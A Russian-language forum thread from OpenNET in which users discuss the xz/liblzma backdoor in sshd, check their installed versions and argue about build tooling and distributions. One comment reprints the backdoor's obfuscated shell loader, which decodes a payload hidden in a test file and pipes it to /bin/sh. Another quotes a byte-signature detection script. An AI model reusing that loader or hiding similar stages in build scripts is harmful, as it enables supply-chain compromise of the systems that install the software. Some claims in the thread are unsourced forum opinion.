The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения только ответов первого уровня [ Отслеживать ]

Оглавление

В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd, opennews (ok), 29-Мрт-24, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


1. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +2 +/
Сообщение от semester (ok), 29-Мрт-24, 22:43 
И как понять что тот бекдор успел натворить? Если он больше месяца существует.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

5. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  –14 +/
Сообщение от FSAemail (??), 29-Мрт-24, 22:51 
Короче. Инцидент был и он в дистрибутивах был, которые никто в здравом уме не будет ставить на прод. А ломать домашние машины... которые по какой-то причине выставлены в сеть... ну это цель нужна и ждать подходящего момента... сомнительное удовольствие.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

6. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +2 +/
Сообщение от Перастерос (ok), 29-Мрт-24, 22:52 
найти и наказать гада — это одно, не допускать такого в принципе — другое..
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

8. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от kusb (?), 29-Мрт-24, 22:58 
хз-utils, ну что, уважаемо, эпично. Эта библиотека есть прям везде. И самое дурное, ведь архиватору не нужен доступ почти ни к чему. Но такой изоляции нет.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

11. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  –24 +/
Сообщение от birdie (ok), 29-Мрт-24, 23:15 
Я уже много лет говорю об этой проблеме и о том, как плохо обстоят дела с безопасностью в Linux. Я знал, что что-то подобное случится, и это случилось.

Почти все дистрибутивы, за исключением, может быть, RHEL, торопятся выложить пакеты из upstream, никогда не проверяя, что исходный код не был затроянен.

Хуже того, независимые мейнтейнеры, назначенные для работы с пакетами, часто даже не являются разработчиками, так что у них нет ни возможностей, ни квалификации, чтобы прочитать код и убедиться, что он по-прежнему заслуживает доверия. Часто сопровождающие отвечают за несколько пакетов, и в то же время это не является их основной работой или тем, за что они получают зарплату, поэтому они практически не заинтересованы в том, чтобы все было правильно.

В то время как крупные корпорации, такие как Microsoft, Google или Apple, одобряют каждую строчку кода, которая попадает к вам как к клиенту, в мире Linux такого не существует. И дело не только в Linux, FreeBSD тоже страдает от этого. Я не уверен насчет OpenBSD/NetBSD, поскольку никогда их не использовал.

Можно ли решить эту проблему? Понятия не имею.

Дистрибутивы Linux должны предпринять согласованные усилия по проверке пакетов и отмечать их как "доверенные". Я никогда не слышал ни о чем подобном, за исключением RHEL, который не является настольным дистрибутивом и, кроме того, сильно ограничил свои связи с сообществом.

Это не проблема XZ. Это проблема всей экосистемы Linux. Вопрос безопасности, надежности, доверия и проверяемости.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

12. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от Ано ним (?), 29-Мрт-24, 23:17 
> сервер OpenSSH, в котором используется liblzma

Это не правда. В sshd не используется liblzma. SSHd _можно_ собрать, слинковав с libsystemd, который в свою очередь, зависит от liblzma. Читайте оригинал сообщения https://www.openwall.com/lists/oss-security/2024/03/29/4

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

16. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +4 +/
Сообщение от Аноним (15), 29-Мрт-24, 23:29 
Вообще xz это зло: https://www.nongnu.org/lzip/xz_inadequate.html
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

22. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +6 +/
Сообщение от Аноним (28), 29-Мрт-24, 23:47 
Gentoo проблема с sshd не аффектит, так как там не используют патчи для systemd-notify: https://bugs.gentoo.org/show_bug.cgi?id=CVE-2024-3094#c3
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

29. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (33), 30-Мрт-24, 00:07 
> Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.

xz --version
xz (XZ Utils) 5.4.1
liblzma 5.4.1

Хакеры 0 : 1 Debian stable

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

32. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (30), 30-Мрт-24, 00:15 
В pkgsrc уже откатились - https://pkgsrc.se/archivers/xz

Но в самом образе NetBSD вообще 5.2.4 версия

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

34. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +21 +/
Сообщение от Аноним (34), 30-Мрт-24, 00:20 
Чувак не виноват, ему просто copilot сделал автоподстановку и он случайно нажал на Tab
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

39. Скрыто модератором  +/
Сообщение от Аноним (-), 30-Мрт-24, 00:32 
Ответить | Правка | Наверх | Cообщить модератору

44. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от birdie (ok), 30-Мрт-24, 00:36 
Всё ещё веселей: https://github.com/google/oss-fuzz/issues/11760#issuecomment...
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

47. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (47), 30-Мрт-24, 00:39 
fedora
$ xz --version
xz (XZ Utils) 5.4.4
liblzma 5.4.4

ubuntu
$ xz --version
xz (XZ Utils) 5.2.5
liblzma 5.2.5

debian
$ xz --version
xz (XZ Utils) 5.4.1
liblzma 5.4.1

Фух. Пронесло =)

Ответить | Правка | Наверх | Cообщить модератору

49. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (42), 30-Мрт-24, 00:41 
> Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.

Ну, ладно.

> https://security.archlinux.org/ASA-202403-1

А эти пишут, что "The problem has been fixed upstream in version 5.6.1."

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

56. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от Аноним (56), 30-Мрт-24, 01:04 
Хорошо, что использую Debian stable, где, как говорят "эксперты", все протухло и он не нужен.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

66. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  –2 +/
Сообщение от Аноним (66), 30-Мрт-24, 01:36 
Ну так себе, для любителей всяких current/testing/unstable версий.
Хорошо что выявили довольно быстро, если бэкдор имел более скрытые особенности могло бы годами так лежать незаметно.
После такого проекту вообще нельзя больше доверять и надо его исключить из состава топ дистров.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

70. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +9 +/
Сообщение от Аноним (68), 30-Мрт-24, 01:44 
Надо было xz на расте писать, с его наркохипанским синтаксисом никто ничего никогда бы не нашёл.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

74. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +2 +/
Сообщение от Лутту (?), 30-Мрт-24, 01:51 
m4???

Невероятно.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

76. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  –2 +/
Сообщение от Oe (?), 30-Мрт-24, 01:54 
Какого черта какой то ноунейм liblzma либе доступно чтение и запись в любую область памяти sshd? Это безопасность линукс такая? Ей богу лучше бы javascript использовали пользы было бы больше чем на сях писать.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

81. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от soarin (ok), 30-Мрт-24, 03:34 
brew upgrade
xz 5.6.1 -> 5.4.6

https://github.com/Homebrew/homebrew-core/pull/167512

Ответить | Правка | Наверх | Cообщить модератору

87. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  –1 +/
Сообщение от Аноним (87), 30-Мрт-24, 04:14 
> This repository has been disabled.

Посжимали и хватит. F

Ответить | Правка | Наверх | Cообщить модератору

88. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от Аноним (88), 30-Мрт-24, 05:08 
>патч для поддержки systemd-notify, приводящий к связыванию sshd к liblzma

Я так понимаю, что если был любой другой инит, а не системда + патч, то этот бекдор не проблема? Сами дураки, поставили инит в котором пропатчив один из модулей подвергают атаке все сразу.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

89. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от Аноним (89), 30-Мрт-24, 05:20 
А сколько таких, которые не попались?!
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

92. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от Аноним (92), 30-Мрт-24, 05:38 
a/xz-5.6.1-x86_64-2.txz: Rebuilt.
       Seems like a good idea to build this from a git pull rather than the signed
       release tarballs. :-)
       The liblzma in the previous packages were not found to be vulnerable by the
       detection script, but I'd rather not carry the bad m4 files in our sources.
       Here's a test script for anyone wanting to try it:
       if hexdump -ve '1/1 "%.2x"' /lib*/liblzma.so.5 | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410 ; then
       echo probably vulnerable
       else
       echo probably not vulnerable
       fi

Вот вам код для проверки от Патрика.

Ответить | Правка | Наверх | Cообщить модератору

97. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +5 +/
Сообщение от Аноним (98), 30-Мрт-24, 07:51 
> в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.

Вот! В этом месте и надо отлавливать вредителей.

Ещё одно место это JIT код который не собирается с -fPIE надо искоренить.

Ответить | Правка | Наверх | Cообщить модератору

99. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  –1 +/
Сообщение от iCat (ok), 30-Мрт-24, 07:57 
libsystemd
Для меня это уже повод насторожиться
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

102. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от вася (??), 30-Мрт-24, 08:04 
Интересно, на сколько лет посадят писателя этого бэкдора?
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

109. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от Аноним (106), 30-Мрт-24, 08:40 
Хомы начинают прозревать, а вдруг не все выходы за границы буфера это просто ошибка? И никакой р-ст не спасёт от злонамеренного использования.
Ответить | Правка | Наверх | Cообщить модератору

111. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  –7 +/
Сообщение от Аноним (-), 30-Мрт-24, 09:09 
Какой позор для опенсорса...
Внезапно оказалось, что открытый код и контролируемые репозитории не спасают от бекдоров...
У фанатиков срочный перерыв на переписывание методичек))
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

123. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +4 +/
Сообщение от Аноним (123), 30-Мрт-24, 09:51 
>Код активации бэкдора был спрятан в m4-макросах из файла build-to-host.m4

Не удивлюсь, если во всех проектах на automake, включая rpm и firejail, такое происходит. Потому что automake - это специальное говно, к которому никто прикасаться и даже смотреть не будет. А те, кто упорствует в своей ереси по использованию automake - пособники бэкдорщиков.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

124. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  –1 +/
Сообщение от Аноним (123), 30-Мрт-24, 09:53 
>Активирующие бэкдор m4-макросы входили в состав tar-архивов релизов, но отсутствовали в Git-репозитории.

Но идиотские дистры вроде Дебиана продолжат собирарь из архивов.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

126. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от сщта (?), 30-Мрт-24, 10:06 
Так это в Сид каком-нибудь только прилетело,навряд ли в обычный Дебиан попало.
Ответить | Правка | Наверх | Cообщить модератору

128. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от Аноним (-), 30-Мрт-24, 10:08 
Эта либа себя дискредитировала.
Jia Tan коммитил в течение для двух лет и любой из этих коммитов не вызывает доверия.
Нужна замена. Более надежная. Например написанная на расте.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

136. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +5 +/
Сообщение от Анонм (?), 30-Мрт-24, 10:14 
m4-макрос, дата редиза - 1977 год
Конечно использовать инструменты полувековой давно так безопасно!

Которые в последствии порождают (хотя честнее сказать высрыают) баш портянку такого вида


export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh-dc|/bin/sh

Да за такой код, без комментариев "чего оно делает", нужно просто закрывать ПР без разговоров.
Хотя я вообще сомневаюсь, что этот кал кто-то читал.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

138. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (166), 30-Мрт-24, 10:16 
Тысячи глаз!
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

145. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от zeecape (ok), 30-Мрт-24, 10:27 
"GitHub полностью заблокировал репозитории xz, xz-java и xz-embedded, которые теперь недоступны для анализа и загрузки прошлых версий"
Microsoft: Какой эксплойт? Вам просто показалось! ("Незаметно" убрали эксплойт)
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

149. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Анонм (-), 30-Мрт-24, 10:32 
> Кроме того, в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.

Хахаха, а теперь расскажите мне, как в (типа) серьезных проектах используют автотесты, санитайзеры и фаззинг.
А никак! Если есть какая-то возможность их отключить, то их отключают, по просьбе какого-то васяна и это апрувит создатель проекта.

ps уверен потом такие же клооуны будут бухтеть
"зачем пихать проверки в компилятор? есть же куча санитайзеров и прочих инструментов, надо просто их использовать и будет вам счастье"

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

155. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от Аноним (-), 30-Мрт-24, 10:51 
О, история становится еще интереснее!
Чел поучаствовал во многих проектах.
Например в libarchive.
Где он создал ПР в котором заменил safe_fprintf на fprintf.
https://github.com/libarchive/libarchive/pull/1609/files

ИЧСХ этот ПР приняли! Вообще без какого-то обсуждения.
А не спросили "какого?!".
Но для проекта C 89.6%.. впрочем, я совершенно не удивлен))

И оно жило спокойно с ноября 2021 года, до сегодняю.
Код ревертнули девять часов назад.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

169. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (123), 30-Мрт-24, 11:17 
Заметьте: изменения были введены после обязательного введения 2FA на GitHub (не подумайте, что с целью усиления "безопасности", до очень недавнего времени без активации 2FA можно было пушить в репозитории, к которым есть доступ, да и сейчас наверное при пуше используется только 1 фактор, а с целью продвижения FIDO2 - бэкдорнутого стандарта, придуманного с целью навязывания продуктов членов Альянса, завязывания аутентификации на них и сбора биометрии). Как я и предупреждал, от сопровождающего-вредителя, а равно — коммерсанта, продавшего проект за круглую сумму, а равно "патриота" государства, в котором живёт и получает зарплату ничего не поможет, а равно просто фраера-лоха, которому сделали предложение, от которого невозможно отказаться: в общем случае от supply chain-атаки, где "легитимный" сопровождающий делает вредоносные изменения, не спасёт ничего. А "Jia Tan" — это просто кукла из носка, которая на руку одевается, как в "Улице Сезам", чтобы смягчить последствия для сопровождающих, что типа Шоколад ни в чём не уиноуат!

Все авторы забекдоренных проектов должны рассматриваться как соучастники.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

186. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (186), 30-Мрт-24, 11:29 
Libselinux также поддерживает liblzma и связывается с гораздо большим количеством программ, чем libsystemd.
Ответить | Правка | Наверх | Cообщить модератору

229. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (288), 30-Мрт-24, 12:48 
Накалякал в Федору: https://pagure.io/fesco/issue/3185

Посмотрим что из этого выйдет. Думаю, что закроют и скажут, "нет ресурсов/не наше дело/да по фигу".

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

238. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от Аноним (238), 30-Мрт-24, 13:00 
> бэкдор был спрятан в m4-макросах .. инструментарием automake

Вот он - Linux way!

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

253. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +3 +/
Сообщение от й (?), 30-Мрт-24, 13:23 
Люди, которые считают,что в PID 1 непременно нужно вкрячить библиотеку компрессии (а также картину корзину картонку и маленькую собачонку) - должны быть готовы к таким сюрпризам и не жаловаться.

Птушо за время пути собака будет расти.

Ответить | Правка | Наверх | Cообщить модератору

254. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от crypt (ok), 30-Мрт-24, 13:24 
атака классная. респект китайцу. жаль, быстро спалили. сижу, жую попкорн:

$ xz --version
xz (XZ Utils) 5.4.5
liblzma 5.4.5
$ freebsd-version
13.3-RELEASE


Ответить | Правка | Наверх | Cообщить модератору

257. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от Аноним (84), 30-Мрт-24, 13:27 
>В 2021 году Jia Tan передал изменение в проект libarchive

Microsoft has signaled it will add native support for tar, 7-zip, rar, gz and "many other" archive file formats to Windows - it's used the libarchive open source project
https://www.theregister.com/2023/05/24/microsoft_rar_support.../

>Jia Tan несколько дней назад был включён в число мэйнтейнеров проекта XZ Embedded, используемого в ядре Linux

Однако, это серьезный провал китайской киберразведки. Столько сил и лет потрачено на внедрение своего человека.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

259. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от Аноним (48), 30-Мрт-24, 13:30 
То, что никто не проверяет соответствие релизных архивов реальным данным в дереве, достаточно удивительно на самом деле. Хотя и не это проблема тут, но изменение моментально бы обнаружилось. А то до воспроизводимых сборок и подписанных блобов додумались, а до воспроизводимых блобов с исходниками нет.
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

291. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +1 +/
Сообщение от Аноним (84), 30-Мрт-24, 15:39 
Проблема "зашита" в libsystemd:
ldd /lib/x86_64-linux-gnu/libsystemd.so.0
    linux-vdso.so.1 (0x00007ffea1bfd000)
    librt.so.1 => /lib/x86_64-linux-gnu/librt.so.1 (0x00007fe963f05000)
    liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007fe963edc000)
    liblz4.so.1 => /lib/x86_64-linux-gnu/liblz4.so.1 (0x00007fe963ebb000)
    libgcrypt.so.20 => /lib/x86_64-linux-gnu/libgcrypt.so.20 (0x00007fe963d9d000)
    libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fe963d7a000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe963b88000)
    /lib64/ld-linux-x86-64.so.2 (0x00007fe963fd6000)
    libgpg-error.so.0 => /lib/x86_64-linux-gnu/libgpg-error.so.0 (0x00007fe963b63000)
Т.е. аналогичный бакдор можно было внедрить в liblz4.so, или libgpg-error.so.

Этой схеме подвержены любые сервисы, слинкованные с libsystemd.so и выполняющие авторизацию pubkey. При загрузке libsystemd.so загружаются зависимые либы и, в случае трояненой liblzma.so, происходила подмена для sshd функции "RSA_public_decrypt" (низкий поклон systemd). Просто автор бакдора ограничил работу только sshd (проверка argv[0] = /usr/sbin/sshd)

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

316. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (316), 30-Мрт-24, 18:34 
Всегда знал, что баш-портянки, регулярные выражения и всякие прочие нечитаемые недоязыки (типа Makefike) - это зло. Если бы выкинули это легаси родом из 70-х и пререшли на нормальную систему сборки (хоть CMake) - проблемы бы не было.

Вообще легаси нужно чистить периодически, а то в мусорной куче заводятся крысы и прочие паразиты.

Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

348. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Berkutemail (??), 31-Мрт-24, 03:22 
В Tumbleweed сегодня из-за этого весь репозиторий пересобрали. Прилетело обновление на 4500 пакетов. Осталось поменять пароли и жить спокойно.
Ответить | Правка | Наверх | Cообщить модератору

355. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от IdeaFix (ok), 31-Мрт-24, 10:07 
Интересно, как оно в ЧПУКС работает...
Ответить | Правка | Наверх | Cообщить модератору
есть ответы, показать

400. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Пряник (?), 01-Апр-24, 09:59 
Видимо xz настолько заброшен, что никто однострочник с eval не увидел.
Ответить | Правка | Наверх | Cообщить модератору

401. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Пряник (?), 01-Апр-24, 10:01 
Так вот зачем китайцы стучатся по SSH!
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру